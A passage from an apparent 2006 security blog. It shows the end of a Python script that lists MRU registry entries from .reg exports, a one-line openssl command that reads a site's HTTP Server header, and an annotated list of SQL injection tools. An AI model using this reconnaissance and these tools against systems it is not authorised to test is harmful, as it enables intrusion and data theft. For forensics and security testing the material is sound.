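        data = m.group(2)
        if len(data) >= 2 and data.startswith('"') and data.endswith('"'):
            data = _unescape(data[1:-1])
        keys[current][name] = data
    return keys


def find_mru(parsed, watch_list=MRU_KEYS):
    """Return {watched key: {value_name: data}} for every watched key present.

    A watched key matches itself and any subkey under it, case-insensitively."""
    hits = {}
    for watched in watch_list:
        prefix = watched.lower()
        for key, values in parsed.items():
            k = key.lower()
            if k == prefix or k.startswith(prefix + "\\"):
                hits.setdefault(watched, {}).update(values)
    return hits


if __name__ == "__main__":
    if len(sys.argv) > 1:
        # regedit writes UTF-16LE with a BOM; older REGEDIT4 exports are ANSI.
        with open(sys.argv[1], "rb") as fh:
            blob = fh.read()
        text = blob.decode("utf-16") if blob.startswith(b"\xff\xfe") else blob.decode("latin-1")
    else:
        text = SAMPLE_REG
    for key, values in find_mru(parse_reg(text)).items():
        print(key)
        for name, data in values.items():
            print("    %s = %s" % (name, data))
```

Run it against an export of HKCU (or of a loaded NTUSER.DAT hive) to get the same result offline that the reg query loop above gives on a live machine; binary MRUListEx ordering data is left as the raw hex: text so it can be decoded separately.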

November 17, 2006

Check the HTTP Server header over HTTPS


Basically:

aramosf~$ echo -e "GET / HTTP/1.0\nHost:www.gmail.com\n\n" | openssl s_client -quiet -connect www.gmail.com:443 2>/dev/null|awk -F: '/^Server:/ { print $2 }'

November 23, 2006

SQL Injection Tools

Here's the list:

sqlbf: without a doubt the first and the best. Geniuses do genius things.
sqlinjector: from NGSSoftware; a bit outdated nowadays.
bfsql: blind SQL injection for MySQL (mine, that is). An infinite TODO, and an infinite++ BUGS list.
sqlpowerinjector: MySQL, Oracle, SQL Server, PostgreSQL, Sybase?... normal and blind SQL injection. I have never managed to get it working.
sqlmap: blind for MySQL and PostgreSQL.
sqlninja: injection for SQL Server.
bobcat: for SQL Server. Not bad, but you have to set up an MSDE to make it run... and it struggles!
absinthe: PostgreSQL, Oracle, SQL Server, Sybase?... quite nice, although it has a couple of flaws that could be improved...
sqlbrute: SQL Server and Oracle. Blind SQL injection for dumping tables. Doesn't work as smoothly as it should.
automagic: automation for exploiting SQL Server.
webinspect - sql injector: commercial, only available in the WebInspect package; Oracle, SQL Server, Sybase... really good.
SQLIBF: really good, very powerful. Nice work!
Priamos: SQLdump for SQL Server. Very simple/effective in my experience.
FG-Injector: a bit confusing to use, but efficient.
SQLDumper: I haven't tested it yet.
SQL Injection Tool: untested.
ISR-sqlget: untested.
SQLix: from OWASP, fairly simple.
SQLID: in Ruby, doesn't convince me.
SQLier: bash script... ehm..
Pangolin: in the three SQL injections I tried it on, it didn't work on any of them; that said, it looks promising.
Squeeza: for MSSQL, released at BH2007, time-based attack.
BSQLHacker: runs on Windows, for MSSQL, Oracle and (in beta) MySQL; time-based.